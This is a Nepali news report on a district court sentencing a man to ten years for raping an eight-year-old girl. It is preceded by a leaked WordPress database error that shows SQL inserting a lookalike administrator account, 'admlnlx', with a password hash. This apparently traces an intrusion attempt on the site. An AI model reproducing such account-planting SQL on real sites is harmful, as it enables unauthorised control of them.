WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkMIkZmZ0/e3eNTs3oABTx5llQDr6m0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 05:04:52', '', 'admlnlx', 'admlnlx')
ताप्लेजुङ, पुस ६-
जिल्ला अदालत ताप्लेजुङले एक नाबालिकालाई जबर्जस्ती करणी गरेको अभियोग लागेका थुकिमा गाविसका बुद्धवीर चोङवाङलाई दोषी ठहर गर्दै दश वर्ष जेल सजाय सुनाएको छ ।
अदालतले दोषी ठहर गरेका थुकिमा गाविस– ४ का चोङवाङबाट पीडित बालिकालाई रु ५० हजार क्षतिपूर्ति भराउने फैसला पनि गरेको छ ।
जिल्ला न्यायाधीश अशोककुमार बस्नेतको इजलासले भोटे भनिने चोङवाङलाई करणी अभियोगमा दोषी ठहर गर्दै कैद सजाय र क्षतिपूर्ति भराउने फैसला गरेको हो ।
जिल्ला अदालतका श्रेस्तेदार गोपालप्रसाद थापाका अनुसार गएको असार २६ गते चोङवाङले रु ५० दिन्छु भनी आठ वर्षीया बालिकालाई ललाइफकाइ मकैबारीमा लगेर जबर्जस्ती करणी गरेका थिए ।
बालिका रुँदै गरेको अवस्थामा अभिभावकले फेला पारी सोधपुछ गर्दा बालिकाले बताएको बयानका आधारमा अभिभावकले प्रहरीमा उजुुरी गरेका थिए ।
प्रहरीले असार २८ गते पक्राउ गरी ल्याएका चोङवाङलाई अदालतले साउन २१ गते पुर्पक्षमा राखी अनुुसन्धान गर्न आदेश दिएको थियो । चोङवाङ अहिले जिल्ला कारागारमा थुनामा रहेका छन् । रासस